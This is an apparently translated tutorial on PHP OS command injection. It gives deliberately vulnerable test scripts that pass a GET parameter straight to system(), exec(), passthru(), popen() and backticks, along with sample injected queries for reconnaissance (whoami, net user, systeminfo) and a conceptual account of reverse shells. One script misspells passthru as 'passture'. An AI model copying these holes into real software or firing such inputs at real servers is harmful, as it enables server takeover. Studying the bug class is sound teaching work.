1. Overview of OS command injection

1. Background: when programmers use script language (such as PHP) to develop applications, script language development is very fast, concise and convenient, but it is also accompanied by some problems, such as slow speed, unable to touch the bottom of the system, etc. When developing applications, especially some enterprise applications need to call some external programs (system commands or executable files such as exe). When the application needs to call some external programs, it will use some system command functions.
2. OS command injection: when the application calls these system command functions, if the user's input is spliced into the command as the parameter of the system command, the command execution vulnerability will be caused without filtering the user's input.
3. Conditions:
   1. The program contains functions or language structures that can execute OS commands;
   2. The parameters passed into the function or language structure can be controlled by the client (which can be directly modified or affected).
4. Vulnerability hazards:
   1. Inherit the Web server program authority (Web user authority) to execute system commands;
   2. Inherit the Web server program permission (Web user permission) to read and write files;
   3. Bounce shell. Usually, when we access a server with port 80 open, we will establish a link with the server Web service to obtain the corresponding Web service of the server. The rebound shell is that we open a port to listen, and then let the server actively rebound a shell to connect to our host, and then we can remotely control the server through the received shell.
   4. Control the whole website;
   5. Control the entire server.

2 correlation function

2.1 system() function

1. Function: this function can execute the string as an OS command with its own output function.
2. Prototype: String System (string $command [, int & $return_var]).
3. Harm: if the parameters of this function are not filtered effectively and accurately, its parameters may be used by users to inject harmful code.
4. The test code is as follows:

<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	system($_GET['cmd']);
}else{
	echo"?cmd=ipconfig";
}
?>

1. When we visit the web page on the client side, we bring in the following parameters. The web page will execute the constructed statement and return the system information (the same is true for the following functions). The injection statement shall be compatible with the target system.

?cmd=ipconfig				//IP configuration information will be returned
?cmd=systeminfo				//Return system information
?cmd=whoami					//
?cmd=net user				//View or add users, etc
?cmd=dir					//File information will be returned
?cmd=ping www.baidu.com		//If you execute the ping command, the result will not be returned until it is finished. On the Windows system, the default Ping is 4 times, but on the linux system, the default Ping is always.

2.2 exec() function

1. Function: this function can execute a string as an OS command, and needs to cooperate with the output result command.
2. Prototype: String exec (string $command [, array & $output [, int & $return_var]]).
3. Harm: if the parameters of this function are not filtered effectively and accurately, its parameters may be used by users to inject harmful code.
4. The test code is as follows:

<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	print exec($_GET['cmd']);
}else{
	echo"?cmd=whoami";
}
?>

2.3 passthru() function

1. Function: execute external programs and display the original output.
2. Prototype: void passthru (string $command [, int & $return_var])
3. Harm: if the parameters of this function are not filtered effectively and accurately, its parameters may be used by users to inject harmful code.
4. The test code is as follows:

<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	passture($_GET['cmd']);
}else{
	echo"?cmd=whoami";
}
?>

2.4 popen() function

1. Function: this function can execute OS commands and return a file pointer. No matter what is returned, what we care about is that the command is executed.
2. Features: different from other functions, you need to pass in the second parameter as the storage file of the execution result of the first parameter.
3. The test code is as follows:

<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	popen($_GET['cmd'],'r');
}else{
	echo"?cmd=whoami";
}
?>

1. When we visit the web page on the client side, the following parameters will be brought in. The web page will execute the constructed statement and generate a file in the same directory (if the file already exists, add content).

?cmd=ipconfig >>1.txt				//IP configuration information will be returned
?cmd=systeminfo >>1.txt				//Return system information
?cmd=whoami >>1.txt					//
?cmd=net user >>1.txt				//View or add users, etc
?cmd=dir >>1.txt					//File information will be returned
?cmd=ping www.baidu.com >>1.txt		//If you execute the ping command, the result will not be returned until it is finished. On the Windows system, the default Ping is 4 times, but on the linux system, the default Ping is always.

2.5 backquote structure

1. Function: the string within the backquote will also be parsed into OS command execution, and the execution result will be echoed at the same time.
2. be careful:
   1. The backquote operator activates safe mode or closes the shell_exec() is invalid.
   2. Unlike some other languages, backquotes cannot be used in double quoted strings.
3. The test code is as follows:

<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	$cmd=$_GET['cmd'];
	print(`$cmd`);
}else{
	echo"?cmd=whoami";
}
?>

3 Summary

1. Understand the functions that may cause OS command injection;
2. Master the use of these functions.